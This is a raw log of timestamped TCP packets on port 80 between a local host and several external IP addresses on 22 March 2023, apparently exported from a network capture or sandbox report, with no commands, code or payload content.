Mar 22, 2023 05:43:14.901767969 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.901794910 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.901823044 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.901850939 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.901880980 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.901910067 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.901937008 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.901968002 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.901977062 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:14.901995897 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.902014017 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:14.902028084 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.902046919 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:14.902057886 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.902086973 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.902117014 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:14.902139902 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:14.902156115 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:14.902199984 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:14.912200928 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:14.912358046 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:14.912754059 CET	80	49762	188.114.97.3	192.168.2.5
Mar 22, 2023 05:43:14.913254023 CET	80	49763	23.227.38.74	192.168.2.5
Mar 22, 2023 05:43:14.920972109 CET	80	49762	188.114.97.3	192.168.2.5
Mar 22, 2023 05:43:14.921112061 CET	49762	80	192.168.2.5	188.114.97.3
Mar 22, 2023 05:43:14.944664001 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:14.958734035 CET	49762	80	192.168.2.5	188.114.97.3
Mar 22, 2023 05:43:14.983789921 CET	80	49762	188.114.97.3	192.168.2.5
Mar 22, 2023 05:43:14.983966112 CET	49762	80	192.168.2.5	188.114.97.3
Mar 22, 2023 05:43:15.046603918 CET	80	49763	23.227.38.74	192.168.2.5
Mar 22, 2023 05:43:15.046725988 CET	49763	80	192.168.2.5	23.227.38.74
Mar 22, 2023 05:43:15.083980083 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.108758926 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.108814955 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.108860016 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.108861923 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.108861923 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.108907938 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.108910084 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.111733913 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.146626949 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.146713018 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.146775007 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.146836996 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.146882057 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.146929979 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.146977901 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147023916 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147059917 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.147059917 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.147059917 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.147059917 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.147059917 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.147059917 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.147080898 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147120953 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.147133112 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.147145033 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147192001 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147239923 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147254944 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.147294044 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.147303104 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147367001 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147418022 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.147438049 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147488117 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147531986 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147538900 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.147574902 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147622108 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.147633076 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147685051 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147691965 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.147731066 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147775888 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147779942 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.147826910 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147875071 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147875071 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.147921085 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.147965908 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.234905005 CET	49764	80	192.168.2.5	208.109.214.162
Mar 22, 2023 05:43:15.380620003 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.380666971 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.380745888 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.380791903 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.380830050 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.380841970 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.380924940 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.380949020 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.381025076 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.384094000 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.384143114 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.384280920 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.390495062 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.390544891 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.390774965 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.390825033 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.390856981 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.390888929 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.390921116 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.390966892 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.391007900 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.391012907 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.391060114 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.391077995 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.391108990 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.391112089 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.391155005 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.391186953 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.391200066 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.391244888 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.391258001 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.391313076 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.391330957 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.391376972 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.391415119 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.391422987 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.391467094 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.391486883 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.391516924 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.391555071 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.391562939 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.391608953 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.391618013 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.391653061 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.391690016 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.391760111 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.410255909 CET	49765	80	192.168.2.5	122.128.109.107
Mar 22, 2023 05:43:15.410721064 CET	80	49764	208.109.214.162	192.168.2.5
Mar 22, 2023 05:43:15.410809994 CET	49764	80	192.168.2.5	208.109.214.162
Mar 22, 2023 05:43:15.411298990 CET	49764	80	192.168.2.5	208.109.214.162
Mar 22, 2023 05:43:15.443144083 CET	49766	80	192.168.2.5	103.3.1.161
Mar 22, 2023 05:43:15.525723934 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.525773048 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.525813103 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.525846004 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.525885105 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.525897980 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.525965929 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.527683020 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.527762890 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.527848959 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.527868986 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.527987003 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.528048038 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.528492928 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.528855085 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.587021112 CET	80	49764	208.109.214.162	192.168.2.5
Mar 22, 2023 05:43:15.587563992 CET	80	49764	208.109.214.162	192.168.2.5
Mar 22, 2023 05:43:15.587685108 CET	49764	80	192.168.2.5	208.109.214.162
Mar 22, 2023 05:43:15.612766981 CET	49764	80	192.168.2.5	208.109.214.162
Mar 22, 2023 05:43:15.617084026 CET	80	49765	122.128.109.107	192.168.2.5
Mar 22, 2023 05:43:15.621058941 CET	49765	80	192.168.2.5	122.128.109.107
Mar 22, 2023 05:43:15.634283066 CET	49765	80	192.168.2.5	122.128.109.107
Mar 22, 2023 05:43:15.634754896 CET	80	49751	39.99.233.155	192.168.2.5
Mar 22, 2023 05:43:15.636596918 CET	49751	80	192.168.2.5	39.99.233.155
Mar 22, 2023 05:43:15.652455091 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.652493000 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.652525902 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.652554035 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.652570009 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.652570009 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.652570963 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.652581930 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.652611017 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.652642012 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.652643919 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.652643919 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.652674913 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.652679920 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.652704000 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.652708054 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.652733088 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.652734041 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.652761936 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.652790070 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.652793884 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.652793884 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.652825117 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.652848959 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.656327963 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.656368971 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.656399965 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.656419039 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.656419992 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.656430006 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.656481028 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.656481028 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.665329933 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.665370941 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.665505886 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.665505886 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.670268059 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.670330048 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.670396090 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.670396090 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.680071115 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.680114985 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.680253029 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.680309057 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.689805031 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.689851046 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.689913988 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.689965010 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.699839115 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.699901104 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.700069904 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.700071096 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.709443092 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.709501028 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.709631920 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.709681034 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.719110966 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.719188929 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.719332933 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.719604969 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.726646900 CET	80	49766	103.3.1.161	192.168.2.5
Mar 22, 2023 05:43:15.726738930 CET	49766	80	192.168.2.5	103.3.1.161
Mar 22, 2023 05:43:15.728836060 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.728894949 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.729036093 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.729083061 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.735157967 CET	49766	80	192.168.2.5	103.3.1.161
Mar 22, 2023 05:43:15.738643885 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.738718033 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.738845110 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.738913059 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.748425007 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.748480082 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.748617887 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.748697042 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.763637066 CET	49767	80	192.168.2.5	172.67.72.98
Mar 22, 2023 05:43:15.785048962 CET	80	49767	172.67.72.98	192.168.2.5
Mar 22, 2023 05:43:15.785293102 CET	49767	80	192.168.2.5	172.67.72.98
Mar 22, 2023 05:43:15.785533905 CET	49767	80	192.168.2.5	172.67.72.98
Mar 22, 2023 05:43:15.789361000 CET	80	49764	208.109.214.162	192.168.2.5
Mar 22, 2023 05:43:15.789490938 CET	49764	80	192.168.2.5	208.109.214.162
Mar 22, 2023 05:43:15.804802895 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.804836035 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.805026054 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.805413008 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.806771994 CET	80	49767	172.67.72.98	192.168.2.5
Mar 22, 2023 05:43:15.809667110 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.809705973 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.809735060 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.809765100 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.819451094 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.819493055 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.819588900 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.819588900 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.828664064 CET	80	49761	74.208.215.199	192.168.2.5
Mar 22, 2023 05:43:15.828772068 CET	49761	80	192.168.2.5	74.208.215.199
Mar 22, 2023 05:43:15.841574907 CET	80	49765	122.128.109.107	192.168.2.5
Mar 22, 2023 05:43:15.843116999 CET	80	49765	122.128.109.107	192.168.2.5
Mar 22, 2023 05:43:15.843148947 CET	80	49765	122.128.109.107	192.168.2.5
Mar 22, 2023 05:43:15.843179941 CET	80	49765	122.128.109.107	192.168.2.5
Mar 22, 2023 05:43:15.843210936 CET	80	49765	122.128.109.107	192.168.2.5
Mar 22, 2023 05:43:15.843241930 CET	80	49765	122.128.109.107	192.168.2.5
Mar 22, 2023 05:43:15.843255043 CET	49765	80	192.168.2.5	122.128.109.107
Mar 22, 2023 05:43:15.843255043 CET	49765	80	192.168.2.5	122.128.109.107
Mar 22, 2023 05:43:15.843255997 CET	49765	80	192.168.2.5	122.128.109.107
Mar 22, 2023 05:43:15.843272924 CET	80	49765	122.128.109.107	192.168.2.5
Mar 22, 2023 05:43:15.843307972 CET	80	49765	122.128.109.107	192.168.2.5
Mar 22, 2023 05:43:15.843312025 CET	49765	80	192.168.2.5	122.128.109.107
Mar 22, 2023 05:43:15.843312025 CET	49765	80	192.168.2.5	122.128.109.107
Mar 22, 2023 05:43:15.843334913 CET	80	49765	122.128.109.107	192.168.2.5
Mar 22, 2023 05:43:15.843347073 CET	49765	80	192.168.2.5	122.128.109.107
Mar 22, 2023 05:43:15.843358040 CET	80	49765	122.128.109.107	192.168.2.5
Mar 22, 2023 05:43:15.843362093 CET	49765	80	192.168.2.5	122.128.109.107
Mar 22, 2023 05:43:15.843389988 CET	49765	80	192.168.2.5	122.128.109.107
Mar 22, 2023 05:43:15.843401909 CET	49765	80	192.168.2.5	122.128.109.107
Mar 22, 2023 05:43:15.924271107 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.924309015 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.924344063 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.924379110 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.924401045 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.924401045 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.924401045 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.924412966 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.924446106 CET	80	49753	154.203.14.100	192.168.2.5
Mar 22, 2023 05:43:15.924469948 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.924469948 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:15.924506903 CET	49753	80	192.168.2.5	154.203.14.100
Mar 22, 2023 05:43:16.018244982 CET	80	49766	103.3.1.161	192.168.2.5
Mar 22, 2023 05:43:16.019784927 CET	80	49766	103.3.1.161	192.168.2.5
Mar 22, 2023 05:43:16.019891977 CET	49766	80	192.168.2.5	103.3.1.161
Mar 22, 2023 05:43:16.144311905 CET	80	49767	172.67.72.98	192.168.2.5
Mar 22, 2023 05:43:16.144351959 CET	80	49767	172.67.72.98	192.168.2.5
Mar 22, 2023 05:43:16.144408941 CET	49767	80	192.168.2.5	172.67.72.98
Mar 22, 2023 05:43:16.144408941 CET	49767	80	192.168.2.5	172.67.72.98
Mar 22, 2023 05:43:16.264630079 CET	80	49727	185.80.51.179	192.168.2.5
Mar 22, 2023 05:43:16.264831066 CET	49727	80	192.168.2.5	185.80.51.179
Mar 22, 2023 05:43:17.038125992 CET	49700	80	192.168.2.5	137.118.26.67
Mar 22, 2023 05:43:17.310502052 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.310547113 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.310638905 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.310679913 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.311006069 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.311055899 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.311086893 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.311100960 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.311109066 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.311145067 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.311172009 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.311187983 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.311228037 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.311233044 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.311239958 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.311279058 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.311288118 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.311336040 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.311338902 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.311388016 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.311412096 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.311459064 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.311798096 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.311844110 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.311857939 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.311888933 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.311889887 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.311939001 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.312619925 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.312664986 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.312691927 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.312710047 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.312711000 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.312757015 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.313410044 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.313457012 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.313473940 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.313503027 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.313503981 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.313549995 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.314235926 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.314284086 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.314305067 CET	49714	80	192.168.2.5	172.67.70.22
Mar 22, 2023 05:43:17.314328909 CET	80	49714	172.67.70.22	192.168.2.5
Mar 22, 2023 05:43:17.314352036 CET	49714	80	192.168.2.5	172.67.70.22
